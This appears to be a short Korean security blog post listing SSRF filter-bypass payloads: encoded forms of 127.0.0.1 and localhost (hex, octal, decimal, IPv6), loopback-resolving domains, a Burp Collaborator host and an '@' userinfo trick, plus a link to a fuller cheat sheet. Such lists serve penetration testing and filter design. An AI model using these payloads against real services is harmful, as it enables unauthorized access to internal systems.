http://vcap.me:1530
http://0x7f.0x00.0x00.0x01:1530
http://0x7f000001:1530
http://2130706433:1530
http://Localhost:1530
고수가 우회하는법
http://127.0.0.1
http://0.0.0.0
http://localhost
http://[::]
http://0000::1
http://spoofed.burpcollaborator.net
http://localtest.me
http://localhost.hahwul.com
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
http://0/
http://127.1
http://127.0.1
http://2130706433
http://0177.0.0.1
http://o177.0.0.1
http://0o177.0.0.1
http://q177.0.0.1
http://[0:0:0:0:0:ffff:127.0.0.1] #IPv6
인터넷에서 찾은것
http://google.com:80@127.0.0.1:3333/
redirect를 이용한것
request시 @앞의값은 무시되고 127.0.0.1:3333로 가게 된다.
더 다양한 우회
https://www.hahwul.com/cullinan/ssrf/
'웹' 카테고리의 다른 글
python flask debugger pin취약점 문제 (0) | 2022.06.08 |
---|---|
Blind OS Command Injection (1) | 2022.05.27 |
MongoDB_Injection (0) | 2022.05.24 |
Python 쓰레드로 한번에 웹에 requests로 브루트포싱하기 (0) | 2021.11.08 |
Turbo Intruder에서 word list를 못 찾아올때 (0) | 2020.08.06 |